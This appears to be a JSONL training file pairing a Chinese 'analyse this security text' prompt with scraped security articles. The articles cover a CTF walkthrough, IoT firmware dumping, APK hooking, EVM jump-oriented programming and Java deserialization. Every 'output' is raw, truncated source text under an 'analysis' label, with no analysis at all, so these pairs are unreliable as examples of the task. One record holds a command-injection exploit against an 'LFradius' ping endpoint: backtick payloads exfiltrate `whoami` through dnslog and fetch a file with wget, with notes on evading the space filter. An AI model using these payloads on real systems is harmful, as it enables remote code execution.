Bootloader 漏洞挖掘 BOOTLOADER 攻击面 Bootloader 漏洞挖掘 BOOTLOADER 漏洞类型  内存破坏漏洞  存储设备写入漏洞  Bootloader 解锁漏洞 Bootloader 漏洞", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0xcsandker  csandker  RSS Feed //Posts //History of Windows //Archive //Tags & Search //ME  Switch Theme Offensive Windows IPC Internals 1: Named Pipes 10 Jan 2021 (Last Updated: 7 1 2022) >> Introduction >> Named Pipe Messaging >> Data Transfer Modes >> Overlapping Pipe I/O, Blocking mode & In-/Out Buffers >> Named Pipe Security >> Impersonation >> Impersonating a Named Pipe Client >> Attack Surface >> Client Impersonation >> Attack scenario >> Prerequisites >> Misleading Documentation Contents: >> Implementation >> Instance Creation Race Condition >> Attack scenario >> Prerequisites >> Implementation >> Instance Creation Special Flavors >> Unanswered Pipe Connections >> Killing Pipe Servers >> PeekNamedPipe >> Prerequisites >> Implementation >> References >> The Series: Part 2 This post marks the start of a series of posts about the internals and interesting bits of various Windows based Inter-Process-Communication (IPC) technology components. Initially this series will cover the following topics: >> Named Pipes >> LPC >> ALPC >> RPC A few IPC technology components are therefore left out, but I might append this series sometime and include for example some of these: >> Window Messages >> DDE (which is based on Window Messages) >> Windows Sockets >> Mail Slots Alright so lets get down to it with Named Pipes Although the name might sound a bit odd pipes are a very basic and simple technology to enable communication and share data between two processes, where the term pipe simply describes a section of shared memory used by these two processes. To term this correctly right from the beginning, the IPC technology were speaking about is called pipes and there are two types of pipes: >> Named Pipes >> Anonymous Pipes Most of the time when speaking about pipes youre likely referring to Named Pipes as these offer the full feature set, where anonymous pipes are mostly used for child-parent communications. This also implies: Pipe communication can be Introduction between two", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCorrelation Power Analysis of AES-256 on ATmega328P 1 游世群 JPChen 許遠哲 Outlines  SCA/DPA/CPA  Hardware Implementation  Demo Video  CPA Implementation on AES Rounds  Countermeasures  Conclusion 2 hidden in an encryption algorithm. Hardware key Side-Channel Analysis Plaintext Ciphertext  There is a key  We need a hardware to implement this system.  This hardware may leak information about the key.  By analyzing the leakages, we can rebuild the key. 3 Encryption Algorithm Differential Power Analysis Compare two power traces from two different encryptions: Differential Power Analysis (DPA)  By analyzing the difference between traces from different encryptions.  Use statistical tools to recover the key. 4  AES is a block cipher.  1 byte as a unit.  Plaintexts, Round Keys, Ciphertexts and Intermediate values can be regarded as 16 independent bytes. Divide and Conquer 12 43 F5 68 77 26 54 87 A3 B3 7E FF 9B 4A AF E8 A Block of AES Search Space: reduced from to 5 Power Consumption in Register 0x00 0 0 0 0 0 0 0 0 0xc3 1 1 0 0 0 0 1 1 4 bits change A register. Assume that each bit changes costs the same value b, the overall power consumption y will be: y = a + HD(0x00, 0xc3)b + N Hamming Distance of these 2 hex-numbers 6 0x00 0 0 0 0 0 0 0 0 Power Consumption in Register 0x6d 0 1 1 0 1 1 0 1 0xc3 1 1 0 0 0 0 1 1 0 1 1 0 1 1 0 1 1 1 0 0 0 0 1 1  Hamming Distance model: y = a + HD(0x6c, 0xc3)b + N 0xc3 1 1 0 0 0 0 1 1  Hamming Weight model: y = a + HW(0xc3)b + N 7 Leakages from AES T0: y0 = a + H( f5(p0,k) )b + N T1: y1 = a + H( f5(p1,k) )b + N T2: y2 = a + H( f5(p2,k) )b + N  Tn: yn = a + H( f5(pn,k) )b + N y = a + HD(0x00, 0xc3)b + N 8 Leakages from AES T0: y0 = a + H( f5(p0,k) )b + N T1: y1 = a + H( f5(p1,k) )b + N T2: y2 = a + H( f5(p2,k) )b + N  Tn: yn = a + H( f5(pn,k) )b + N k: key pi : known plaintext fi : the i-th Intermediate value function H: Hamming Distance or Hamming Weight 9 Correlation Power Analysis T0: y0 = a + H( f5(p0,k) )b + N T1: y1 = a + H( f5(p1,k) )b + N ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nuseradd === 创建的新的系统用户 ## 补充说明 **useradd命令** 用于Linux中创建的新的系统用户useradd可用来建立用户帐号帐号建好之后再用passwd设定帐号的密码而可用userdel删除帐号使用useradd指令所建立的帐号实际上是保存在`/etc/passwd`文本文件中 在Slackware中adduser指令是个script程序利用交谈的方式取得输入的用户帐号资料然后再交由真正建立帐号的useradd命令建立新用户如此可方便管理员建立用户帐号在Red Hat Linux中 **adduser命令** 则是useradd命令的符号连接两者实际上是同一个指令 ### 语法 ```shell useradd(选项)(参数) ``` ### 选项 ```shell -b, --base-dir BASE_DIR # 如果未指定 -d HOME_DIR则系统的默认基本目录如果未指定此选项useradd 将使用 /etc/default/useradd 中的 HOME 变量指定的基本目录或默认使用 /home -c, --comment COMMENT # 加上备注文字任何文本字符串它通常是对登录名的简短描述目前用作用户全名的字段 -d, --home HOME_DIR # 将使用 HOME_DIR 作为用户登录目录的值来创建新用户 -D, --defaults # 变更预设值 -e, --expiredate EXPIRE_DATE # 用户帐户将被禁用的日期 日期以 YYYY-MM-DD 格式指定 -f, --inactive INACTIVE # 密码过期后到帐户被永久禁用的天数 -g, --gid GROUP # 用户初始登录组的组名或编号组名必须存在组号必须引用已经存在的组 -G, --groups GROUP1[,GROUP2,...[,GROUPN]]] # 用户也是其成员的补充组列表每个组用逗号隔开中间没有空格 -h, --help # 显示帮助信息并退出 -k, --skel SKEL_DIR # 骨架目录其中包含要在用户的主目录中复制的文件和目录当主目录由 useradd 创建时 -K, --key KEY=VALUE # 覆盖 /etc/login.defs 默认值UID_MINUID_MAXUMASKPASS_MAX_DAYS 等 -l, --no-log-init # 不要将用户添加到 lastlog 和 faillog 数据库 -m, --create-home # 如果用户的主目录不存在则创建它 -M # 不要创建用户的主目录即使 /etc/login.defs (CREATE_HOME) 中的系统范围设置设置为 yes -N, --no-user-group # 不要创建与用户同名的组而是将用户添加到由 -g 选项或 /etc/default/useradd 中的 GROUP 变量指定的组中 -o, --non-unique # 允许创建具有重复非唯一UID 的用户帐户 此选项仅在与 -o 选项结合使用时有效 -p, --password PASSWORD # crypt(3) 返回的加密密码 默认是禁用密码 -r, --system # 创建一个系统帐户 -s, --shell SHELL # 用户登录 shell 的名称 -u, --uid UID # 用户 ID 的数值 -U, --user-group # 创建一个与用户同名的组并将用户添加到该组 -Z, --selinux-user SEUSER # 用户登录的 SELinux 用户 默认情况下将此字段留空这会导致系统选择默认的 SELinux 用户 # 更改默认值 # 当仅使用 -D 选项调用时useradd 将显示当前默认值 当使用 -D 和其他选项调用时useradd 将更新指定选项的默认值 有效的默认更改选项是 ``` ### 参数 用户名要创建的用户名 ### 退出值 `useradd` 命令以以下值退出 ```shell 0 成功 1 无法更新密码文件 2 无效的命令语法 3 选项的无效参数 4 UID 已经在使用并且没有 -o 6 指定的组不存在 9 用户名已被使用 10 无法更新组文件 12 无法创建主目录 13 无法创建邮件假脱机 14 无法更新 SELinux 用户映射 ``` ### 文件 ```shell /etc/passwd # 用户帐户信息 /etc/shadow # 保护用户帐户信息 /etc/group # 组帐户信息 /etc/gshadow # 保护组帐户信息 /etc/default/useradd # 帐户创建的默认值 /etc/skel/ # 包含默认文件的目录 /", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Wallaby's Nightmare 下载地址https://download.vulnhub.com/wallabys/wallabysnightmare102.rar ## 实战演练 发现靶场IP`192.168.32.157` ![image-20220620193752791](../../.gitbook/assets/image-20220620193752791.png) 扫描对外IP端口 ``` (rootkali)-[~/Desktop] # nmap -sT -sV -p1-65535 192.168.32.157 Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-20 07:38 EDT Nmap scan report for 192.168.32.157 Host is up (0.00074s latency). Not shown: 65532 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 6667/tcp filtered irc MAC Address: 00:0C:29:03:CE:57 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.93 seconds ``` 浏览器访问80端口叫你输入一个名字开始CTF比赛 ![image-20220620193947231](../../.gitbook/assets/image-20220620193947231.png) ![image-20220620194039601](../../.gitbook/assets/image-20220620194039601.png) > 这是什么鬼?一个叫test的家伙想侵入我的服务器?失败者一定不知道我是伟大的小袋鼠! > > 让我们先观察一下也许我可以从他的行为中了解他 尝试本地包含漏洞 ![image-20220620194138992](../../.gitbook/assets/image-20220620194138992.png) > 伙计你的做法很可疑啊你一定认为小袋鼠的密码像猴子一样!不过我最好还是去保护这个SQLi > > (袋鼠发现你在尝试LFI你必须更狡猾!难度增加) 刷新浏览器发现失败后面使用nmap再次扫描端口发现http端口变成了60080 ![image-20220620194323549](../../.gitbook/assets/image-20220620194323549.png) 访问60080端口 ![image-20220620194356018](../../.gitbook/assets/image-20220620194356018.png) > 天哪这个家伙想要我很高兴我搬到了另一个端口这样我可以更安全地工作!! > > 我们都知道通过隐藏实现安全是可行的方法 继续尝试本地包含文件漏洞 ![image-20220620195547968](../../.gitbook/assets/image-20220620195547968.png) 直接用字典fuzz ``` (rootkali)-[~/Desktop] # dirb http://192.168.32.157:60080/index.php?page= /usr/share/wordlists/dirb/big.txt ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon Jun 20 07:56:15 2022 URL_BASE: http://192.168.32.157:60080/index.php?page= WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt ---------------", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n针对智能设备漏洞挖掘的 一些新方法 小灰灰 百度安全实验室 高级安全研究员 30-May2019 2 关于我 百度安全实验室 高级安全研究员 研究领域IoT安全/AI安全/无人车安全 多次破解硬件设备 之前负责  BSRC应急处置0day分析  百度产品 安全评估  百度安全监控体系建设 传统IOT设备的破解 路由器 固件下载 Binwalk解包 找到有问题的binwhy IDA分析WEB 脚本文件分析 漏洞验证真机or QEMU测试 大多数 好像都是漏洞分析 现在 IOT设备越来越多种多样 not only 路由器 大厂也不会让你轻易破解  固件不提供下载  telnet串口ADB都关闭  甚至都无从下手 怎么办 似乎有着相似的结构 操作系 统及 硬件 完整的AndroidLinux 发行版 ARMv5/6/7/x86处理器 EMMC/EMCP/NAND存 储存储 Openwrt精简内核的 LinuxARMMips处 理器NAND/SPI Flash 存储 RTOS实时精简内核的 LinuxESP乐鑫 Arduion片上系统AVR STM32系列SPI Flash存 储 应用场 景 智能音箱智能手表 自动售货机电视盒子 智能电视智能广告牌 车机 路由器mini版智能音 箱智能摄像头 智能门锁智能电饭煲 智能插座智能灯智能 手环 特点 较多功能较大的存储 易于开发APP的载体 大多有大屏幕 单一但高级功能无需 屏幕展示内容or小尺寸 屏幕 功能单一简单但大多有通 过网络进行简单控制模 拟电路无法实现 第0步拆 做到心中有数减少弯路  有没有搞头用了哪些芯片解决方案  没有思路时 哪些地方还可以搞 搜索芯片型号信息datasheet 重点关注  存储类型及规格  SPI Flash 8/16/宽窄  EMMC/EMCP 100/153/162/169/186/221/254  NandFlash TSOP32/40/48  TTL及JTAG接口如何寻找  通信模块以太蓝牙wifi234G 图片来自https://www.crowdsupply.com/teardown/portland-2018 云拆解--寻找攻击目标的好方法 Google xxx teardown 论坛拆客论坛 Ifixit.com  包含著名厂商硬件设备  图片清晰标注 Fccid.io  所有带有无线功能在国外发行的设备  种类繁多  技巧搜索 site:fccid.io internal photos xxx 特斯拉钥匙使用的主控-在fccid.io网站上搜索到 Kindle Fire 的存储结构-在ifixit网站上搜索到 第一步 准备工作随心所欲的控制获取 控制&获取  获取文件系统  Getshell 更方便的分析查看网络文件进程  获取控制网络数据 最终根据这些已有内容进行综合分析寻找有效漏洞 Tips并没有完全的先后顺序同步穿插进行  例如getshell后直接就可以获取固件了或者dump获取固件进行修改后便getshell了  例如获取交互数据可以拿到升级连接直接获取固件下载地址 准备工作-获取固件 目的  了解OS 及文件系统结构关注关键目录/etc /home /usr/bin ,如果是Android, /system/priv- app  分析启动脚本/etc/inittab /etc/init.d)加载的二进制文件以及配置文件  分析web目录文件CGIPHPLua..  方便恢复到老版本系统例如开启了telnet分析更方便  固件也可能是新版本APK逆向分析之  Chroot到对应处理器的QEMU方便分析二进制&web 准备工作-获取固件 方法  官网下载  自升级监听数据包如果查询版本需要截取修改低版本特殊信道  升级app逆向分析升级流程逆向分析访问ftp  求助论坛好心网友行业维修论坛  万能的客服帮忙救砖  获取shelltelnetsshadbdump 固件ddtarnc转出  进入BootLoader 读取存储器  特殊主控读取方式例如MTKNXP系列可以通过数据线口获取/刷写文件系统 But有时这些都不奏效 物理Dump 当常规方法无法轻易获取固件  大厂设备固件都是加密的binwalk等无法解开  没有固件升级流程固件写死不变  固件通过GPRS升级无法干预实际我们可以干预  TTL关闭telnet关闭BootLoader无法停止进入 那么就开拆物理dump  针对不同型号采取不同读取方式  步骤  选择读取设备方式在线 or 离线  对固件进行处理 物理Dump-SPI Flash 针对SPI Flash对应简单设备路由设备  串行读写设备常见容量4/8/16MB8针脚 SPI接口  结构  完整操作系统Bootl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPRELIMINARY SLIDES FINAL DECK AVAILABLE AFTER DEF CON Popping a Smart Gun DEF CON 25 plore@tuta.io PRELIMINARY SLIDES FINAL DECK AVAILABLE AFTER DEF CON What is a smart gun?  Gun that can be fired only by authorized parties  Various authorization/authentication approaches  Biometrics (e.g., fingerprint reader)  RFID ring  Etc.  See A Review of Gun Safety Technologies for a more thorough discussion (Greene 2013)  Greene gets some details wrong about the smart gun we will discuss today PRELIMINARY SLIDES FINAL DECK AVAILABLE AFTER DEF CON In the movies Skyfall PRELIMINARY SLIDES FINAL DECK AVAILABLE AFTER DEF CON Smart guns  Examples that have been prototyped  iGun shotgun (RFID ring)  Kloepfer pistol (fingerprint)  Magna-Trigger/Magloc retrofit (magnets)  Safe Gun retrofit (fingerprint)  Only one model currently for sale in the US  Armatix iP1 (NFC/RF watch) PRELIMINARY SLIDES FINAL DECK AVAILABLE AFTER DEF CON Why I care PRELIMINARY SLIDES FINAL DECK AVAILABLE AFTER DEF CON Armatix iP1: watch and pistol PRELIMINARY SLIDES FINAL DECK AVAILABLE AFTER DEF CON Design overview  Two system components  Pistol  Watch  Watch authorizes pistol to fire  Watch must be near the pistol (<25 cm)  Communication  Pistol watch: 5.35 kHz inductive  Pistol watch: 916.5 MHz PRELIMINARY SLIDES FINAL DECK AVAILABLE AFTER DEF CON Armatix iP1 operation 1. Enter PIN on watch 2. Wear watch within 25 cm of pistol 3. Squeeze grip on pistol 4. Fire pistol PRELIMINARY SLIDES FINAL DECK AVAILABLE AFTER DEF CON (Demo of normal operation) PRELIMINARY SLIDES FINAL DECK AVAILABLE AFTER DEF CON Normal operation 25 cm Heres a token Hey! *squeeze* 1 2 Good, now I can fire 3 4 PRELIMINARY SLIDES FINAL DECK AVAILABLE AFTER DEF CON 5.35 kHz burst Burst PRELIMINARY SLIDES FINAL DECK AVAILABLE AFTER DEF CON Watch auth token to pistol Sync Constant data Dynamic data Constant data Dynamic data Checksum PRELIMINARY SLIDES FINAL DECK AVAILABLE AFTER DEF CON Pistol reply to watch Sync Constant data Checksum Batter", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n一概述 最近需要逆深信服的 Easyconnect.apk无壳但有混淆so 层抛弃整个系统通信框架 使用自编译的 openssl 为后续与服务器通信图片均已厚码处理感谢看雪高研有什 么错误还请师傅指出 二连接服务器请求分析 连接服务器时会发送先后两个请求下面先看第一个 先使用脚本 hook onclik 点击事件得到所实现的 ConnectActivity [WatchEvent] onClick: com.sangfor.vpn.client.phone.ConnectActivity 跟入 o(): o()中调用 showDialog(10)显示对话框后再新建 cb 对象并新建异步任务 任务中调用了 cb 对象的 a(): 继续跟进 b()方法其中 arg2 为 url url 经过判断后进入 ConnectActivity 的 a()方法在该方法中设置好相应参数后调用 l()方 法 L()方法中拼接 url 新建异步任务 其中在任务中 doInBackground()调用了 ConnectActivity.a()方法 在 A()中主要调用了 HttpConnect.requestStringWithURL(): 继续跟入最终调用了 httprequest()的 native 方法: 根据后续的分析 arg1 为 urlarg2 为 TWFID 等 cookie 信息agr3 为传输的内容arg4 为是 否为 post 提交arg5 后续加密验证方式arg6 为 http 版本 接着在 onPostExecute 发送第二个请求给服务器 跟入其 a()方法同样调用了 ConnectActivity.a()方法 进行跟入 b()可见在函数新建了线程跟入其线程函数 注 意 这 里 v2.put(mobileid,u.f().b()) 把 mobileid 一 起 发 给 服 务 器 https://ip:port/por/login_auth.csp?dev=android-phone&language=zh_CN 最后调用 httpRequest()发送给服务器的数据包 在发第二个请求包时会先获取到内存中的 mobileidV2 为 hashmap在调用 httpRequest 前压入了值跟入 b(): B()返回 f 的值查找引用 可见 f 为 nDeprecatedEncryptMobileId()调用后的结果返回给 a()执行后的值 跟入 A()可见函数主要对传入参数进行 md5 故我们 hook 住 nDeprecatedEncryptMobileId 函数得到其 mobileid 和返回值 (\"27b3d55fdc6e0c60\") \"P\\u0004\\u0006\\u0006QSQ\\u0005R\\u0006\\u0006\\u0006\\u0006S\\u0004\\u0007\" 我们回头看看 mobileid 是如何产生的可见是先从 map 中取出 查找引用找到相关赋值的地方跟入 c() 找到其 this.g 赋值可见先调用了 e()进行判断是否有 telephony 模块 如果有则调用 getDeviceId(): 三登录请求分析 接着就是登录请求的数据包我们通过上面找到发包的函数先进行 hook 注意第二个数据包的响应包含<TwfID>xxxxxxxxxxx</TwfID>该值会先保存在 cookie 中在 登录时一同发送 Ver 为当前软件版本 mobileid 是 md5 后的值固定的 TWFID 是第二个请求服务器后返回的值后续保存在 cooike 中 MOBILETWFID 与 TWFID 一样 svpn_password 用户名 svpn_name 密码 我们跟入函数所在 so经观察 so 中自编译 openssl 库但符号还在 直接上脚本 hook libc因为 so 中自编译 openssl 库直接调用 libc 的 write 和 read不走 libssl 的 ssl_write/bio_wriet 和 ssl_read/bio_read所以 hook libc 只能捉到对应的密文 我们可以 hook libhttps.so 的 SSL_write()和 SSL_read()即可得到 SSL 处理前的明文 这是连接服务是所发送的第一个请求及其响应的数据 这是连接服务是所发送的第二个请求及其响应的数据 这是用户登录时所发送的用户名及数据给服务器的请求及其响应 我们可以构造 mobileid 后请求服务器 https://ip:port/por/login_auth.csp 得到后续 TWFID 使用 frida 主动调用 httpRequest 并传入 TWFID 访问 https://ip:port/po", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\napp=\"LF-\" <?php class ping extends spController { function main() { $host = $_GET['host']; $num = (int) $_GET['num']; $host = str_replace(\"|\", \"\", $host); $host = str_replace(\" \", \"\", $host); $host = str_replace(\"&\", \"\", $host); $host = str_replace(\">\", \"\", $host); $host = str_replace(\"<\", \"\", $host); if (!$host) { die(\"ûύIP\"); } if (!$num) { if (!filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) { if (lf_getaddrbyhost(\"www.qq.com\") == \"www.qq.com\") { die(\"ӵã<br>\"); } $host = lf_getaddrbyhost($host); fofa rce1 } unset($_COOKIE['ping']); setcookie(\"ping\", $host, time() + 20, \"/\"); echo \"5pingԣ[\" . $_GET['host'] . \"]<br>\"; echo 'PING ' . $host . ' (' . $host . ') 56(84) bytes of data.<br>'; die; } else { $host = $_COOKIE['ping']; } $result = lf_rootrun('ping -c 1 -W 2 ' . $host . '|grep icmp', 1); if ($result) { echo $result . \"<br>\"; } else { echo 'reply time out!<br>'; } if ($num == 5) { echo 'ɣ'; unset($_COOKIE['ping']); setcookie(\"ping\", NULL, -1, \"/\"); } } function start() { $this->host = $_GET['host']; $this->display(\"ping.html\"); } } GET /lfradius/login.php/eth/login.php?c=ping&a=main&host=`whoami`.v4d331.dnslog.cn&num=0 HTTP/1.1 Host: xxx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chr ome/78.0.3904.108 Safari/537.36 Accept: */* Referer: http://xxx/lfradius/login.php/eth/qos Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=5v4cr5he1eo0lra761tuqb6tho; check_admin_pass=1; lfradius_menu_save_cookie=1; lfradi us_nav_content_active=14; lf_timeout=1625018466; LF_TOKEN_HASH=8119690d12c5663e6afb8d3f4335b897 Connection: close  1bash %20%09(tab)%2b(+) in url{IFS} 2Win shell %20%09(tab)%0b%0c%2b(+) in url GET /lfradius/login.php/eth/login.php?c=ping&a=main&host=`wget%09http://xxx/up.php`.thxhur.dnslog.cn& num=0 HTTP/1.1 Host: xxx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chr ome/78.0.3904.108 Safari/537.36 Accept: */* Refere", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTrolling with Math base26_t YOU = 0x038C2767; Trolling with Math wat?  frank2  pronounced frank 2 (the carat is ~flare~)  that guy with the hat  DC949  DC310 Trolling with Math When we last left our heroes...  I have no idea what the fuck frank2 is talking about, but its awesome.  More content, less bullshit. Content Trolling with Math ya we pumpin Trolling with Math MATH!  Its very possible your math teacher made this more complicated than it needs to be.  f(x) = x * 7  (lambda x: x * 7)  public static int multiplyBySevenAndReturn(Integer x) { return x * 7; }  Mathematic functions can get even more complicated, but this is all we need for now. Trolling with Math ASSEMBLY!  JMP and CALL instructions are not specific with immediate values. Theyre offsets.  JMP 00401000 is more like JMP-A-FEW- BYTES-AHEAD. Its the same with CALL.  ...except CALL sticks its dick in your stack.  Hot. Trolling with Math ASSEMBLY!  Oh, except for when you stick an address in a register. Totally different.  When you stick an address in a register and then do something like CALL EAX, it specifically goes to whatever value is in EAX.  Same goes for CALL [EAX] or JMP [EAX]-- it just dereferences EAX and jumps to that address. Trolling with Math ASSEMBLY!  Lets talk about JMP SHORT.  This is essentially a jump within the range of -127 8==0==D 127.  Regular JMP instructions are more like -2147483647 8====0====D 2147483647 Trolling with Math ASSEMBLY!  There is no such thing as CALL SHORT.  I know, right?  What the hell. Trolling with Math ASSEMBLY!  Heres some computer science witchcraft.  Technically you can define the space between each instruction as... Trolling with Math Trolling with Math ASSEMBLY!  Each instruction is executed one after another.  This can be interpreted as an unconditional jump to the next instruction.  This gives us space between each assembly instruction so long as each instruction is subsequently linked by an unconditional jump. Trolling with Math ASSEMBLY! MOV EAX,5355434", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Jump Oriented Programming ## 原理 类似于 pwn 中的 ROPEVM 中也有 JOPJump Oriented ProgrammingJOP 的思想和 ROP 是相似的串联起一个个小的代码片段gadget达成一定的目的 涉及到JOP 的是如下三个字节码 - 0x56 JUMP - 0x57 JUMPI - 0x5B JUMPDEST 在 EVM 中的无条件跳转 `JUMP` 和条件跳转 `JUMPI` 的目的地都必须是 `JUMPDEST`这点和 ROP 可以任选返回地址不同 另外需要注意的是EVM 虽然使用的是变长指令但是不允许像 ROP 那样跳到一条指令的中间比如 64 位的 `pop r15` 是 `A_`ROP 时直接落在第二个字节则可以当成 `pop rdi` 使用EVM `PUSH1 0x5B` 中的 `0x5B` 则不能当作 `JUMPDEST` 使用 通常需要用到 JOP 的合约在编写时都夹杂着内联汇编的后门需要人工逆向识别查找两样东西 1. 通常控制流可达可以控制跳转地址的起点 1. `JUMPDEST` 之后实现了一些特殊功能然后再接一个 `JUMP` 指令的各种 gadget gadget 需要实现的功能因题目要求或考察点而异比如要实现一个外部合约的调用就要先按照顺序将各种偏移gas等数据布置在栈上在 JOP 的最后需要一个 `JUMPDEST; STOP` 作为结束的着陆点否则一旦执行出错就会导致交易回滚 除了以上的三个字节码EIP-2315 还提出了 `BEGINSUB``RETURNSUB``JUMPSUB` 三个字节码其中 `JUMPSUB` 和 `JUMP` 相似只是跳转的目的地必须是 `BEGINSUB`而 `RETURNSUB` 相当于 ROP 中的 `ret`对目标地址没有限制EIP-2315 在柏林升级前曾被列入升级列表不久后又被移除目前仍处于草案阶段 ## 题目 ### RealWorldCTF Final 2018 - 题目名称 Acoraida Monica ### RealWorldCTF 3rd 2021 - 题目名称 Re: Montagy !!! note 注题目附件相关内容可至 [ctf-challenges/blockchain](https://github.com/ctf-wiki/ctf-challenges/tree/master/blockchain) 仓库寻找", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ntrap === 捕捉信号和其他事件并执行命令 ## 概要 ```shell trap [-lp] [[arg] signal_spec ...] ``` ## 主要用途 - 用于指定在接收到信号后将要采取的动作 - 脚本程序被中断时执行清理工作 ## 选项 ```shell -l 打印信号名称以及信号名称对应的数字 -p 显示与每个信号关联的trap命令 ``` ## 参数 arg接收到信号时执行的命令 signal_spec信号名称或信号名称对应的数字 ## 返回值 如果表达式执行结果为成功时返回0当参数 `signal_spec` 没有指定有效值时返回1 ## 关于信号 信号是一种进程间通信机制它给应用程序提供一种异步的软件中断使应用程序有机会接受其他程序活终端发送的命令(即信号)应用程序收到信号后有三种处理方式忽略默认或捕捉进程收到一个信号后会检查对该信号的处理机制如果是SIG_IGN就忽略该信号如果是SIG_DFT则会采用系统默认的处理动作通常是终止进程或忽略该信号如果给该信号指定了一个处理函数(捕捉)则会中断当前进程正在执行的任务转而去执行该信号的处理函数返回后再继续执行被中断的任务 在有些情况下我们不希望自己的shell脚本在运行时刻被中断比如说我们写得shell脚本设为某一用户的默认shell使这一用户进入系统后只能作某一项工作如数据库备份 我们可不希望用户使用 Ctrl+C 等方法进入到shell状态做我们不希望做的事情这便用到了信号处理 以下是一些你可能会遇到的常见信号 | 信号名称 | 信号数 | 描述 | | ------- | --- | ---- | | SIGHUP | 1 | 本信号在用户终端连接正常或非正常结束时发出通常是在终端的控制进程结束时通知同一session内的各个作业这时它们与控制终端不再关联登录Linux时系统会分配给登录用户一个终端(Session)在这个终端运行的所有程序包括前台进程组和后台进程组一般都属于这个Session当用户退出Linux登录时前台进程组和后台有对终端输出的进程将会收到SIGHUP信号这个信号的默认操作为终止进程因此前台进程组和后台有终端输出的进程就会中止对于与终端脱离关系的守护进程这个信号用于通知它重新读取配置文件 | | SIGINT | 2 | 程序终止(interrupt)信号在用户键入 Ctrl+C 时发出 | | SIGQUIT | 3 | 和SIGINT类似但由QUIT字符(通常是Ctrl+\\\\)来控制进程在因收到SIGQUIT退出时会产生core文件在这个意义上类似于一个程序错误信号 | | SIGFPE | 8 | 在发生致命的算术运算错误时发出不仅包括浮点运算错误还包括溢出及除数为0等其它所有的算术错误 | | SIGKILL | 9 | 用来立即结束程序的运行本信号不能被阻塞处理和忽略 | | SIGALRM | 14 | 时钟定时信号计算的是实际的时间或时钟时间alarm 函数使用该信号 | | SIGTERM | 15 | 程序结束(terminate)信号, 与SIGKILL不同的是该信号可以被阻塞和处理. 通常用来要求程序自己正常退出kill 命令缺省产生这个信号 | ## 例子 当shell收到 `HUP INT PIPE QUIT TERM` 这几个命令时当前执行的程序会执行 `exit 1` ```shell [root@pc root]$ trap \"exit 1\" HUP INT PIPE QUIT TERM ``` ### 1 清理临时文件 下面展示了如果有人试图从终端中止程序时如何删除文件然后退出 ```shell trap \"rm -f $WORKDIR/work1 $WORKDIR/dataout; exit\" 2 ``` 执行shell程序如果程序接收信号为2那么这两个文件 work1 和 dataout 将被自动删除 添加信号1 `SIGHUP` ```shell $ trap \"rm $WORKDIR/work1 $WORKDIR/dataout; exit\" 1 2 ``` ### 2 忽略信号 如果陷阱列出的命令是空的指定的信号接收时将被忽略 ```shell $ trap '' 2 ``` 忽略多个信号 ```shell $ trap '' 1 2 3 15 ``` ### 3 重置陷阱 当你改变了收到信号后采取的动作你可以省略第一个参数来重置到默认行为 ```shell $ trap 1 2 ``` ### 注意 1. `trap -l` 等价于执行 `kill -l` 2. 发送信号请查看 `kill` 命令 3. 该命令是bash内建命令相关的帮助信息请查看 `help` 命令 4. 建议您", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n对URLDNS探测class的补充 问题 刚刚有个师傅私聊问到我这个问题这来谈谈当时师傅的章确实也没提到这 点 遗忘的师傅可以回顾下https://gv7.me/articles/2021/construct-java-detection-class-deserialization -gadget/ 这个问题就是为什么明明没这个类我在本地成的时候明明没有这个类为什么还会收到 DNS请求 解决 在问题之前我们简单说下调流程便简单会议下 将url与检测类分别放HashMap的key/value 触发反序列化后先是恢复HashMap的key再恢复value 之后调putVal时触发key的hashcode法导致DNS解析触发 如果我们探测的class为不存在的class那么就打断了这个过程的第步由于没有try/catch 做异常处理利此我们可以成功通过URLDNS探测class 为什么没有这个类本地调试成的时候会触发其实这和javassist有关先来个图进直 观的解释 没错正如你所想问题出于 makeClass 当中的 toClass 这个法中的toClass其实就根 据我们输参数的 className 构造了个类并加载到了 jvm 当中 当然这样说太敷衍了还是简单上下代码这贴些关键的 在 javassist.ClassPool#toClass(javassist.CtClass, java.lang.ClassLoader, java.security.ProtectionDomain) 可以看到这个 toClass2 其实就是反射调法调的是什么其实就是这 个 defineClass1/2 public static Class 